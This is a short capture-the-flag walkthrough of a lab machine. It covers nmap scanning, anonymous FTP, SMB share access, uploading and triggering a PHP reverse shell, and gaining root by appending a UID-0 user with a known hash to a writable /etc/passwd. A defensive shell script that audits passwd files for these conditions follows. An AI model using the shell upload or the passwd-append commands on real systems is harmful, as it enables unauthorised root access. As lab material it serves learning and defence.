Scanning the box with “nmap -T4 -A 192.168.8.189 -vv”

A few ports are open. Port 2121 is the FTP service, so we connect to it with “ftp 192.168.8.189 2121”.
We can see from the Nmap results that there is a file there that we can pull and read on our machine; the login username and password are both “anonymous”:
But when we got the file, there were only some strange letters in it and nothing more to do with it, so I moved on to the next step and used the SMB service to enumerate:


Running “smbclient -L //192.168.8.189/ -U " " -N” returned a share named “WRKSHARE”:

smbclient \\\\192.168.8.189\\WRKSHARE

Now we are in, and the next step is to upload a reverse shell to the path “/var/www/html”:

Then we open the file in the browser at “192.168.8.189/rshell.php” while a listener is running on our machine:

I took a look at the “passwd” file and it’s writable, so we can add a new user with root privileges:
openssl passwd -1 -salt hacker 123456
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:www-data:bin/bash' >> /etc/passwd


Now we run “su hacker” and enter the password “123456”:


We got the root flag. There is also a user flag in the home directory of a user named “miguel”.
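
On the defensive side, the writable “passwd” step above leaves traces that are easy to audit for. The script below is an added example, not part of the original write-up: it checks a passwd-format file for group/other write permission, non-root accounts with UID 0, and password fields that hold something other than a shadow placeholder. The function name, the finding labels and the sample entries (including the placeholder hash) are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original write-up): audit a passwd-format file
# for the conditions that made the privilege escalation above possible.

# audit_passwd FILE: prints one finding per line, returns 1 if any were found.
audit_passwd() {
    ap_file=$1
    ap_rc=0

    # The file must not be writable by group or others (normally mode 644).
    # GNU stat first, BSD stat as a fallback.
    ap_mode=$(stat -c '%a' "$ap_file" 2>/dev/null || stat -f '%Lp' "$ap_file")
    if [ $(( 0$ap_mode & 022 )) -ne 0 ]; then
        echo "MODE $ap_file is $ap_mode: writable by group or others"
        ap_rc=1
    fi

    # Per-entry checks: only "root" should have UID 0, and the password field
    # should be a placeholder (x, * or !) that defers to /etc/shadow.
    ap_out=$(awk -F: '
        /^#/ || NF == 0 { next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 ": non-root account with UID 0" }
        $2 !~ /^(x|\*|!+)$/ { print "PWFIELD " $1 ": password field is not a shadow placeholder" }
    ' "$ap_file")
    if [ -n "$ap_out" ]; then
        echo "$ap_out"
        ap_rc=1
    fi
    return $ap_rc
}

# Constructed sample input: three normal entries plus one appended entry with
# UID 0 and an inline hash (the hash value is a placeholder, not a real one).
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
miguel:x:1000:1000::/home/miguel:/bin/bash
hacker:$1$SALT$PLACEHOLDERHASH:0:0:www-data:bin/bash
EOF
chmod 666 "$sample"
audit_passwd "$sample" || true
rm -f "$sample"
```

On a real host, call `audit_passwd /etc/passwd`; a clean file prints nothing and the function returns 0.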
